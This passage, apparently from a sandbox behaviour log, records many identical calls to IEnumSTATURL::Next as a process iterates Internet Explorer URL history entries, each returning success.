pceltFetched=0xddb40*=0x1) returned 0x0 [0280.330] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.330] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.330] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.330] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.331] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.331] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.331] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.332] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.332] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.332] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.333] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.333] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.333] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.333] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.333] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.334] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.334] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.335] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.335] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.335] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.335] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.336] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.336] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.336] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.336] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.336] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.337] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.343] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.344] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.345] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.345] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.345] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.345] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.346] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.346] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.346] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.347] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.347] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.347] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.347] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.347] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.348] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.348] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.349] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.349] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.350] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.350] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.350] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.351] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.351] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.351] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.352] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.352] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.353] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.353] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.353] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.353] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.354] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.354] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.359] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.359] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.359] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.359] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.360] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.360] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.360] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.360] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.361] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.361] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.361] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.361] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.362] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.362] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.362] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.363] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.363] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.363] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.363] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.364] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.364] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.364] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.365] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.365] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.365] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.365] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.366] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.366] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.366] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.366] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.367] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.367] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.371] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.372] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.372] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.373] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.373] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.373] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.374] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.374] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.374] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.376] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.376] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.376] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.377] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.377] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.377] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.378] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.378] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.378] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.379] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.379] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.379] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.379] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.380] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.380] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.380] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.381] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.381] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.381] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.381] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.382] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.382] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.385] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.388] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.389] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.390] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.390] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.390] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.391] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.391] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.392] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.392] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.392] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.393] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.393] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.393] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.394] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.394] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.395] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.395] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) 